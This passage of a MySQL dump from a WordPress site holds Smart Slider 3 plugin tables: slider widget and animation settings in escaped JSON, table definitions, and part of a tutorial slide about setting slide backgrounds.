\"widget-thumbnail-action\":\"click\",\"widget-thumbnail-align-content\":\"start\",\"widget-thumbnail-style-bar\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"242424ff\\\",\\\"padding\\\":\\\"3|*|3|*|3|*|3|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"0\\\",\\\"extra\\\":\\\"\\\"}]}\",\"widget-thumbnail-style-slides\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"00000000\\\",\\\"padding\\\":\\\"0|*|0|*|0|*|0|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|ffffff00\\\",\\\"borderradius\\\":\\\"0\\\",\\\"opacity\\\":\\\"40\\\",\\\"extra\\\":\\\"margin: 3px;\\ntransition: all 0.4s;\\nbackground-size: cover;\\\"},{\\\"border\\\":\\\"0|*|solid|*|ffffffcc\\\",\\\"opacity\\\":\\\"100\\\",\\\"extra\\\":\\\"\\\"}]}\",\"widget-thumbnail-title-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"000000ab\\\",\\\"padding\\\":\\\"3|*|10|*|3|*|10|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"0\\\",\\\"extra\\\":\\\"bottom: 0;\\nleft: 0;\\\"}]}\",\"widget-thumbnail-title\":\"0\",\"widget-thumbnail-title-font\":\"{\\\"data\\\":[{\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"12||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ab\\\",\\\"afont\\\":\\\"Montserrat\\\",\\\"lineheight\\\":\\\"1.2\\\",\\\"bold\\\":0,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"left\\\"},{\\\"color\\\":\\\"fc2828ff\\\",\\\"afont\\\":\\\"google(@import url(http://fonts.googleapis.com/css?family=Raleway);),Arial\\\",\\\"size\\\":\\\"25||px\\\"},{}]}\",\"widget-thumbnail-description\":\"0\",\"widget-thumbnail-description-font\":\"{\\\"data\\\":[{\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"12||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ab\\\",\\\"afont\\\":\\\"Montserrat\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"bold\\\":0,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"left\\\"},{\\\"color\\\":\\\"fc2828ff\\\",\\\"afont\\\":\\\"google(@import url(http://fonts.googleapis.com/css?family=Raleway);),Arial\\\",\\\"size\\\":\\\"25||px\\\"},{}]}\",\"widget-thumbnail-caption-placement\":\"overlay\",\"widget-thumbnail-caption-size\":\"100\",\"widget-thumbnail-arrow\":\"1\",\"widget-thumbnail-arrow-width\":\"26\",\"widget-thumbnail-arrow-offset\":\"0\",\"widget-thumbnail-arrow-prev-alt\":\"previous arrow\",\"widget-thumbnail-arrow-next-alt\":\"next arrow\",\"widget-thumbnail-arrow-image\":\"\",\"widget-thumbnail-group\":\"1\",\"widget-thumbnail-invert-group-direction\":\"0\",\"widget-thumbnail-orientation\":\"auto\",\"widget-thumbnail-size\":\"100%\",\"widget-thumbnail-display-hover\":\"0\",\"widget-thumbnail-display-mobileportrait\":\"1\",\"widget-thumbnail-display-mobilelandscape\":\"1\",\"widget-thumbnail-display-tabletportrait\":\"1\",\"widget-thumbnail-display-tabletlandscape\":\"1\",\"widget-thumbnail-display-desktopportrait\":\"1\",\"widget-thumbnail-display-desktoplandscape\":\"1\",\"widget-thumbnail-exclude-slides\":\"\",\"widget-shadow-enabled\":\"0\",\"widgetshadow\":\"shadow\",\"widget-shadow-shadow\":\"dark.png\",\"widget-shadow-shadow-image\":\"\",\"widget-shadow-width\":\"100%\",\"widget-shadow-display-mobileportrait\":\"1\",\"widget-shadow-display-mobilelandscape\":\"1\",\"widget-shadow-display-tabletportrait\":\"1\",\"widget-shadow-display-tabletlandscape\":\"1\",\"widget-shadow-display-desktopportrait\":\"1\",\"widget-shadow-display-desktoplandscape\":\"1\",\"widget-shadow-exclude-slides\":\"\",\"widget-fullscreen-enabled\":\"0\",\"widgetfullscreen\":\"image\",\"widget-fullscreen-tonormal\":\"full1.svg\",\"widget-fullscreen-tonormal-image\":\"\",\"widget-fullscreen-tonormal-color\":\"ffffffcc\",\"widget-fullscreen-mirror\":\"1\",\"widget-fullscreen-tofull\":\"full1.svg\",\"widget-fullscreen-tofull-image\":\"\",\"widget-fullscreen-tofull-color\":\"ffffffcc\",\"widget-fullscreen-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"000000ab\\\",\\\"padding\\\":\\\"10|*|10|*|10|*|10|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"3\\\",\\\"extra\\\":\\\"\\\"},{\\\"backgroundcolor\\\":\\\"000000ab\\\"}]}\",\"widget-fullscreen-position-mode\":\"simple\",\"widget-fullscreen-position-area\":\"4\",\"widget-fullscreen-position-stack\":\"1\",\"widget-fullscreen-position-offset\":\"15\",\"widget-fullscreen-position-horizontal\":\"left\",\"widget-fullscreen-position-horizontal-position\":\"0\",\"widget-fullscreen-position-horizontal-unit\":\"px\",\"widget-fullscreen-position-vertical\":\"top\",\"widget-fullscreen-position-vertical-position\":\"0\",\"widget-fullscreen-position-vertical-unit\":\"px\",\"widget-fullscreen-responsive-desktop\":\"1\",\"widget-fullscreen-responsive-tablet\":\"0.7\",\"widget-fullscreen-responsive-mobile\":\"0.5\",\"widget-fullscreen-display-hover\":\"0\",\"widget-fullscreen-display-mobileportrait\":\"1\",\"widget-fullscreen-display-mobilelandscape\":\"1\",\"widget-fullscreen-display-tabletportrait\":\"1\",\"widget-fullscreen-display-tabletlandscape\":\"1\",\"widget-fullscreen-display-desktopportrait\":\"1\",\"widget-fullscreen-display-desktoplandscape\":\"1\",\"widget-fullscreen-exclude-slides\":\"\",\"widget-html-enabled\":\"0\",\"widgethtml\":\"html\",\"widget-html-position-mode\":\"simple\",\"widget-html-position-area\":\"2\",\"widget-html-position-stack\":\"1\",\"widget-html-position-offset\":\"0\",\"widget-html-position-horizontal\":\"left\",\"widget-html-position-horizontal-position\":\"0\",\"widget-html-position-horizontal-unit\":\"px\",\"widget-html-position-vertical\":\"top\",\"widget-html-position-vertical-position\":\"0\",\"widget-html-position-vertical-unit\":\"px\",\"widget-html-code\":\"\",\"widget-html-display-hover\":\"0\",\"widget-html-display-mobileportrait\":\"1\",\"widget-html-display-mobilelandscape\":\"1\",\"widget-html-display-tabletportrait\":\"1\",\"widget-html-display-tabletlandscape\":\"1\",\"widget-html-display-desktopportrait\":\"1\",\"widget-html-display-desktoplandscape\":\"1\",\"widget-html-exclude-slides\":\"\",\"animation\":\"fade\",\"animation-duration\":\"500\",\"animation-delay\":\"0\",\"animation-easing\":\"easeOutQuad\",\"carousel\":\"1\",\"background-animation\":\"\",\"background-animation-color\":\"333333ff\",\"background-animation-speed\":\"normal\",\"animation-shifted-background-animation\":\"auto\",\"kenburns-animation\":\"50|*|50|*|\",\"kenburns-animation-speed\":\"default\",\"kenburns-animation-strength\":\"default\",\"shape-divider\":\"\",\"particle\":\"\",\"playfirstlayer\":\"1\",\"playonce\":\"0\",\"layer-animation-play-in\":\"end\",\"layer-animation-play-mode\":\"skippable\",\"parallax-enabled\":\"1\",\"parallax-enabled-mobile\":\"0\",\"parallax-3d\":\"0\",\"parallax-animate\":\"1\",\"parallax-horizontal\":\"mouse\",\"parallax-vertical\":\"mouse\",\"parallax-mouse-origin\":\"slider\",\"parallax-scroll-move\":\"both\",\"autoplay\":\"0\",\"autoplayDuration\":\"8000\",\"autoplayStart\":\"1\",\"autoplayAllowReStart\":\"0\",\"autoplayLoop\":\"1\",\"autoplayfinish\":\"1|*|loop|*|current\",\"loop-single-slide\":\"0\",\"autoplayStopClick\":\"1\",\"autoplayStopMouse\":\"0\",\"autoplayStopMedia\":\"1\",\"autoplayResumeClick\":\"0\",\"autoplayResumeMouse\":\"0\",\"autoplayResumeMedia\":\"1\",\"widget-autoplay-enabled\":\"0\",\"widgetautoplay\":\"image\",\"widget-autoplay-play\":\"small-light.svg\",\"widget-autoplay-play-image\":\"\",\"widget-autoplay-play-color\":\"ffffffcc\",\"widget-autoplay-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"000000ab\\\",\\\"padding\\\":\\\"10|*|10|*|10|*|10|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"3\\\",\\\"extra\\\":\\\"\\\"},{\\\"backgroundcolor\\\":\\\"000000ab\\\"}]}\",\"widget-autoplay-mirror\":\"1\",\"widget-autoplay-pause\":\"small-light.svg\",\"widget-autoplay-pause-image\":\"\",\"widget-autoplay-pause-color\":\"ffffffcc\",\"widget-autoplay-responsive-desktop\":\"1\",\"widget-autoplay-responsive-tablet\":\"0.7\",\"widget-autoplay-responsive-mobile\":\"0.5\",\"widget-autoplay-position-mode\":\"simple\",\"widget-autoplay-position-area\":\"4\",\"widget-autoplay-position-stack\":\"1\",\"widget-autoplay-position-offset\":\"15\",\"widget-autoplay-position-horizontal\":\"left\",\"widget-autoplay-position-horizontal-position\":\"0\",\"widget-autoplay-position-horizontal-unit\":\"px\",\"widget-autoplay-position-vertical\":\"top\",\"widget-autoplay-position-vertical-position\":\"0\",\"widget-autoplay-position-vertical-unit\":\"px\",\"widget-autoplay-display-hover\":\"0\",\"widget-autoplay-display-mobileportrait\":\"1\",\"widget-autoplay-display-mobilelandscape\":\"1\",\"widget-autoplay-display-tabletportrait\":\"1\",\"widget-autoplay-display-tabletlandscape\":\"1\",\"widget-autoplay-display-desktopportrait\":\"1\",\"widget-autoplay-display-desktoplandscape\":\"1\",\"widget-autoplay-exclude-slides\":\"\",\"widget-indicator-enabled\":\"0\",\"widgetindicator\":\"pie\",\"widget-indicator-position-mode\":\"simple\",\"widget-indicator-position-area\":\"4\",\"widget-indicator-position-stack\":\"1\",\"widget-indicator-position-offset\":\"15\",\"widget-indicator-position-horizontal\":\"left\",\"widget-indicator-position-horizontal-position\":\"0\",\"widget-indicator-position-horizontal-unit\":\"px\",\"widget-indicator-position-vertical\":\"top\",\"widget-indicator-position-vertical-position\":\"0\",\"widget-indicator-position-vertical-unit\":\"px\",\"widget-indicator-size\":\"25\",\"widget-indicator-thickness\":\"30\",\"widget-indicator-track\":\"000000ab\",\"widget-indicator-bar\":\"ffffffff\",\"widget-indicator-style\":\"\",\"widget-indicator-display-hover\":\"0\",\"widget-indicator-display-mobileportrait\":\"1\",\"widget-indicator-display-mobilelandscape\":\"1\",\"widget-indicator-display-tabletportrait\":\"1\",\"widget-indicator-display-tabletlandscape\":\"1\",\"widget-indicator-display-desktopportrait\":\"1\",\"widget-indicator-display-desktoplandscape\":\"1\",\"widget-indicator-exclude-slides\":\"\",\"imageload\":\"0\",\"imageloadNeighborSlides\":\"0\",\"optimize-scale\":\"0\",\"optimize-quality\":\"70\",\"optimize-thumbnail-scale\":\"0\",\"optimize-thumbnail-quality\":\"70\",\"optimize-slide-width-normal\":\"1920\",\"optimizeThumbnailWidth\":\"100\",\"optimizeThumbnailHeight\":\"60\",\"layer-image-optimize\":\"0\",\"layer-image-width-tablet\":\"800\",\"layer-image-width-mobile\":\"425\",\"layer-image-base64\":\"0\",\"layer-image-base64-size\":\"50\",\"slides-background-video-mobile\":\"1\",\"playWhenVisible\":\"1\",\"playWhenVisibleAt\":\"50\",\"dependency\":\"\",\"delay\":\"0\",\"is-delayed\":\"0\",\"backgroundMode\":\"fill\",\"slide-css\":\"\",\"randomize\":\"0\",\"randomizeFirst\":\"0\",\"randomize-cache\":\"1\",\"variations\":\"5\",\"reverse-slides\":\"0\",\"maximumslidecount\":\"1000\",\"maintain-session\":\"0\",\"global-lightbox\":\"0\",\"global-lightbox-label\":\"0\",\"slide-background-parallax\":\"0\",\"slide-background-parallax-strength\":\"50\",\"bg-parallax-tablet\":\"0\",\"bg-parallax-mobile\":\"0\",\"blockrightclick\":\"0\",\"controlsBlockCarouselInteraction\":\"1\",\"clear-both\":\"1\",\"clear-both-after\":\"1\",\"overflow-hidden-page\":\"0\",\"responsiveFocusUser\":\"1\",\"responsiveFocusEdge\":\"auto\",\"classes\":\"\",\"custom-css-codes\":\"\",\"callbacks\":\"\",\"related-posts\":\"\"}','published','2020-02-25 13:53:41','https://smartslider3.com/wp-content/uploads/slider404/tutorialsliderthumbnail-1.png',0);
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_sliders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_smartslider3_sliders_xref`
--

DROP TABLE IF EXISTS `wp_nextend2_smartslider3_sliders_xref`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_smartslider3_sliders_xref` (
  `group_id` int(11) NOT NULL,
  `slider_id` int(11) NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`group_id`,`slider_id`),
  KEY `ordering` (`ordering`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_smartslider3_sliders_xref`
--

LOCK TABLES `wp_nextend2_smartslider3_sliders_xref` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_sliders_xref` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_sliders_xref` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_smartslider3_slides`
--

DROP TABLE IF EXISTS `wp_nextend2_smartslider3_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_smartslider3_slides` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` text DEFAULT NULL,
  `slider` int(11) NOT NULL,
  `publish_up` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `published` tinyint(1) NOT NULL,
  `first` int(11) NOT NULL,
  `slide` longtext DEFAULT NULL,
  `description` text NOT NULL,
  `thumbnail` text DEFAULT NULL,
  `params` text NOT NULL,
  `ordering` int(11) NOT NULL,
  `generator_id` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`),
  KEY `publish_up` (`publish_up`),
  KEY `publish_down` (`publish_down`),
  KEY `generator_id` (`generator_id`),
  KEY `ordering` (`ordering`),
  KEY `slider` (`slider`),
  KEY `thumbnail` (`thumbnail`(100))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_smartslider3_slides`
--

LOCK TABLES `wp_nextend2_smartslider3_slides` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_slides` DISABLE KEYS */;
INSERT INTO `wp_nextend2_smartslider3_slides` VALUES
(1,'Slide Background',1,'1970-01-01 00:00:00','1970-01-01 00:00:00',1,0,'[{\"type\":\"content\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":1120,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitselfalign\":\"center\",\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-IbNOabpfT5aE\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"layers\":[{\"type\":\"row\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"desktopportraitgutter\":0,\"desktopportraitwrapafter\":0,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"tabletportraitgutter\":20,\"mobileportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"mobileportraitgutter\":20,\"mobileportraitwrapafter\":1,\"mobileportraitmaxwidth\":400,\"mobilelandscapewrapafter\":1,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-dtwtw9DVCwgQ\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"href\":\"\",\"href-target\":\"_self\",\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"ffffff00\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"borderwidth\":\"1|*|1|*|1|*|1\",\"borderstyle\":\"none\",\"bordercolor\":\"FFFFFFFF\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"fullwidth\":1,\"stretch\":0,\"name\":\"Row\",\"namesynced\":1,\"cols\":[{\"type\":\"col\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"left\",\"desktopportraitpadding\":\"10|*|10|*|10|*|10|*|px\",\"desktopportraitorder\":0,\"tabletportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"mobileportraitinneralign\":\"left\",\"mobileportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"mobileportraitorder\":2,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-Fjvyu081qJeK\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"colwidth\":\"2/5\",\"href\":\"\",\"href-target\":\"_self\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"borderwidth\":\"0|*|0|*|0|*|0\",\"borderstyle\":\"solid\",\"bordercolor\":\"ffffffff\",\"name\":\"Column\",\"namesynced\":1,\"layers\":[{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":60,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Jeans Store Interior\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"36||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.2\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"01. Slide Background\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Lorem ipsum dolor sit amet, consect\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"24||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"weight\\\":300,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Every slide includes a background, which can be a picture or solid color.\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":100,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Latest Project\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffdb\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"uppercase\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Step 1\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":90,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Text\",\"namesynced\":1,\"item\":{\"type\":\"text\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"18||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.6\\\",\\\"weight\\\":400,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"}]}\",\"style\":\"\",\"content\":\"To change the background click on the label bar and in the layer window select the style tab.\",\"content-tablet-enabled\":\"0\",\"contenttablet\":\"\",\"content-mobile-enabled\":\"0\",\"contentmobile\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":100,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Latest Project\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffdb\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"uppercase\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Step 2\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":90,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Text\",\"namesynced\":1,\"item\":{\"type\":\"text\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"18||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.6\\\",\\\"weight\\\":400,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letters